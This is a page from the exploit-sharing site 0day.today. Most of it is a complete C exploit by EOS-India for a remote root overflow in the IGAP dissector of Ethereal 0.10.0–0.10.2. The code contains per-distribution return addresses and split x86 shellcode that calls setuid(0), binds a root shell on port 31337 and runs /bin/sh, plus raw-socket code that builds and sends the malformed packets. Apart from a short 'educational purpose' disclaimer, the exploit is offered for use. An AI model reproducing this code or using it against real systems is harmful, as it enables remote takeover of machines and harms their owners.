0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit
[========================================================
Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit
========================================================
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
* Ethereal IGAP Dissector Message Overflow Remote Root exploit
*
* Copyright 2004 - EOS-India Group
*
* Authors note:
* Shellcode splitting technique:
* Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
* for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
* is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
* jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode
* requires EBP to contain a usuable stack address, we overwrite saved EBP also.
*
* Disclaimer:
* This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
* be held responsible for any damage caused due to misuse of this code.
* This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
* Ethereal 0.10.2.
*
* Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
* http://www.eos-india.net
*
*/
#define IPPROTO_IGAP 0x02 // IPPROTO_IGMP=0x02
#define PAYLOAD_SIZE (255-64)
#define MAX_BUFF sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER "0.2"
#define SOCKET_ERROR -1
#define MAX_PACKET 10
#define RETOFFSET 76
#define SRC_IP "192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#define MAX_ARCH 5
struct eos{
char *arch;
unsigned long ret;
} targets[] = {
"tEthereal(0.10.2)-Gentoo(gdb)",
0xbffede50,
//-------------------------------
"tEthereal(0.10.2)-Gentoo ",
0xbffede10,
//-------------------------------
"Ethereal(0.10.2)-Gentoo ",
0xbfffd560,
//-------------------------------
"tEthereal(0.10.2)-RedHat 8 ",
0xbffedfb8,
//-------------------------------
"Ethereal(0.10.2)-RedHat 8 ",
0xbfffcd08,
//-------------------------------
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
char shellcode_firsthalf[]=
/* sys_fork() */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\xb0\x02" // movb $0x2,%al
"\xcd\x80" // int $0x80
"\x38\xc3" // cmpl %ebx,%eax
"\x74\x05" // je 0x5
/* sys_exit() */
"\x8d\x43\x01" // leal 0x1(%ebx),%eax
"\xcd\x80" // int $0x80
/* setuid(0) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\xb0\x17" // movb $0x17,%al
"\xcd\x80" // int $0x80
/* socket() */
"\x31\xc0" // xorl %eax,%eax
"\x89\x45\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"\x40" // incl %eax
"\x89\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"\x89\x45\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"\x40" // incl %eax
"\x89\x45\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"\x8d\x4d\x08" // leal 0x8(%ebp),%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x89\x45\x08" // movl %eax,0x8(%ebp)
;
char jumpcode[]="\xeb\x10";
char shellcode_secondhalf[]=
/* bind()*/
"\x43" // incl %ebx(SYS_BIND = 0x2)
"\x66\x89\x5d\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"\x66\xc7\x45\x16\x7a\x69" // movw $0x697a,0x16(%ebp)(port=31337)
"\x31\xd2" // xorl %edx,%edx
"\x89\x55\x18" // movl %edx,0x18(%ebp)
"\x8d\x55\x14" // leal 0x14(%ebp),%edx
"\x89\x55\x0c" // movl %edx,0xc(%ebp)
"\xc6\x45\x10\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
/* listen() */
"\x40" // incl %eax
"\x89\x45\x0c" // movl %eax,0xc(%ebp)
"\x43" // incl %ebx
"\x43" // incl %ebx(SYS_LISTEN = 0x4)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
/* accept() */
"\x43" // incl %ebx
"\x89\x45\x0c" // movl %eax,0xc(%ebp)
"\x89\x45\x10" // movl %eax,0x10(%ebp)
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x89\xc3" // movl %eax,%ebx
/* dup2() */
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
"\x41" // incl %ecx
"\x80\xf9\x03" // cmpb $0x3,%cl
"\x75\xf6" // jne -0xa
/* execve() */
"\x31\xd2" // xorl %edx,%edx
"\x52" // pushl %edx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x52" // pushl %edx
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80"; // int $0x80
struct ipheader {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short int ip_len;
unsigned short int ip_id;
unsigned short int ip_off;
unsigned char ip_ttl;
unsigned char ip_proto;
unsigned short int ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
struct igap_header { // This is a malformed header which does not conforms with IGAP RFC
unsigned char igap_type; // Message Type
unsigned char igap_restime; // Response Time
unsigned short int igap_cksum; // IGAP Message Checksum
unsigned int igap_gaddr; // Group Address
unsigned char igap_ver; // Version
unsigned char igap_stype; // SubType
unsigned char igap_reserved1; // Reserved
unsigned char igap_cid; // Challenge ID
unsigned char igap_asize; // Account Size
unsigned char igap_msgsize; // Message Size
unsigned short int igap_reserved2; // Reserved
/*
unsigned char igap_uaccount[16];// User Account
unsigned char igap_message[64] // Message
*/
unsigned char igap_payload[16+64+PAYLOAD_SIZE];
// This buffer will contain payload, here we differ from RFC by sending a bigger message.
};
unsigned short checksum(unsigned short *buf,int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *(buf)++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void showhelp(char *pr00gie) {
int i=0;
printf("######### The Eye on Security Research Group - India ########\n");
printf("%s %s\n",EXP,VER);
printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
printf("http://www.eos-india.net\n\n");
printf("[usage]\n");
printf("%s [Remote Host] [Target]\n",pr00gie);
printf("[Available Targets]\n");
while(targets[i].arch != NULL) {
printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret);
i++;
}
exit(1);
}
int main(int argc,char *argv[]) {
char buffer[MAX_BUFF];
struct ipheader *iphdr=(struct ipheader*)buffer;
struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
int sockfd;
unsigned long addr;
int one=1;
int i;
const int *val=&one;
struct sockaddr_in sin;
unsigned long magic;
unsigned int n;
if(getuid()) {
printf("- This code opens SOCK_RAW which needs root privilege\n");
exit(1);
}
if(argc != 3)
showhelp(argv[0]);
n=atoi(argv[2]);
if(n >= MAX_ARCH) {
printf("- Invalid target\n");
showhelp(argv[0]);
}
magic=targets[n].ret;
printf("-Using RET %p\n",magic);
addr=inet_addr(argv[1]);
if(addr==INADDR_NONE) {
printf("- Invalid target\n");
exit(1);
}
sin.sin_addr.s_addr=addr;
sin.sin_family=AF_INET;
sin.sin_port=0x00;
sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
if(sockfd==SOCKET_ERROR) {
printf("- Failed creating SOCK_RAW descriptor\n");
exit(1);
}
if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)
printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");
memset(buffer,0x00,MAX_BUFF);
// Filling IP Header
iphdr->ip_hl=0x05;
iphdr->ip_v=0x04;
iphdr->ip_tos=0x00;
iphdr->ip_len=MAX_BUFF;
iphdr->ip_id=htonl(54321);
iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
iphdr->ip_ttl=0x01;
iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
iphdr->ip_sum=0x00; // Fill sum before sending packet
iphdr->ip_src=inet_addr (SRC_IP);
iphdr->ip_dst=addr;
// Filling IGAP Header
igaphdr->igap_type=0x41; // IGAP Membership Query
igaphdr->igap_restime=0x0a; //
igaphdr->igap_cksum=0x00; // compute before sending packet
igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
igaphdr->igap_ver=0x01; // IGAPv1
igaphdr->igap_stype=0x21; // Basic Query
igaphdr->igap_reserved1=0x00; // Ignored
igaphdr->igap_cid=0x00;
// Challenge ID (ignored because Chanllenge Response authentication not used)
igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message
igaphdr->igap_reserved2=0x00; // Reserved
// Building exploit buffer
//for(i=0;i<16+64+PAYLOAD_SIZE;i++)
// memset(igaphdr->igap_payload+i,(unsigned char)i,1);
memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
strlen(shellcode_firsthalf));
memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);
magic-=0x10;
memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);
memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
shellcode_secondhalf,strlen(shellcode_secondhalf));
// Calculating checksum
igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
(sizeof(struct igap_header))>>1);
iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
// Sending
one=MAX_PACKET;
while(one) {
sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));
printf(".");
one--;
}
close(sockfd);
printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);
printf("- Read source to know what to do to check if the exploit worked\n");
return 0;
}
# 0day.today [2024-11-15] #